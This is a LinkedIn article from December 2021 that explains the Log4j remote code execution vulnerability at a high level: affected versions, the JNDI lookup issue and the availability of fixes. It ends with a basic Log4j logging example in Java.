What is Log4j vulnerability?
Image Credits: https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html

What is Log4j vulnerability?

Chandan Singh Chandan Singh

Chandan Singh

Manager @ PwC | Workday | GenAI and Emerging Tech Enthusiast

发布日期: 2021年12月20日
+ 关注

The Log4j Vulnerability was first reported by Alibaba Cloud Security Team late in November 2021 and then was alerted to Apache Software Foundation Team which maintains the Log4j Library.

Log4j is a very popular Java-based Logging tool created by Ceki Gülcü. It's used by many enterprises like Apple, SalesForce, Oracle, Redhat, Cloudflare, Google. This vulnerability causes Remote Code Execution. Remote Code Execution(RCE) is a process in which the hackers inject malicious code into applications on servers and servers unknowingly execute those malicious codes. Remote Code Execution (RCE) is also referred to as Remote Code Evaluation.?

The Vulnerability has been classified as Very Critical. we can check the CVSS Score here which is 10/10.

Impacts of Remote Code Evaluation Vulnerability

  • Add, Modify, Delete server files
  • Communicate with Databases, other servers
  • Inject and execute Malicious Code

Remote Code Execution Image. Credits: https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack

Log4j Vulnerability Description

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behaviour has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Fix for this vulnerability has been already released by Apache and we can find the details here.

领英推荐

What is Log4j?

Log4j is divided into three main components Loggers, Appenders and Layouts.

Loggers: This is responsible for capturing the logging information and passing it on to Appenders.

Appenders: This is responsible for publishing the logging data into file, Database, Console.

Layouts: This is responsible for the formatting of the log messages. Some default layouts provided by Log4j are PatternLayout, SimpleLayout, XMLLayout, HTMLLayout.

Log4j Demonstration: 

import org.apache.logging.log4j.Logger
import org.apache.logging.log4j.LogManager;

public class Log4jExample {

    private static Logger logger = LogManager.getLogger(Log4jExample.class);

    public static void main(String[] args) {
        logger.debug("Debug log message");
        logger.info("Info log message");
        logger.error("Error log message");
    }
};

After we compile and execute this above code we get output as below 

Debug log message
Info log message
Error log message

Thanks! :)

要查看或添加评论,请登录

Chandan Singh的更多文章

  • JavaScript's Evolution: Shaping the Future of Web Development
    2024年5月25日

    JavaScript's Evolution: Shaping the Future of Web Development

    JavaScript, the ubiquitous language of the web, has come a long way since its inception. It's no longer just the tool…

  • Getting Started with Angular.js
    2022年11月20日

    Getting Started with Angular.js

    If you’re looking to get started with Angular.js, you’ve come to the right place.

    2 条评论
  • Blockchain Architecture
    2021年5月25日

    Blockchain Architecture

    What is Blockchain? Blockchain is a decentralized, Immutable block of Digital ledger wherein each block contains the…

    6 条评论
  • Using Firebase Realtime DB with Python
    2021年5月24日

    Using Firebase Realtime DB with Python

    What is Firebase? Firebase is a Popular Cloud-hosted NoSQL Database developed by Google. This is known as BaaS (Backend…

    9 条评论

社区洞察

其他会员也浏览了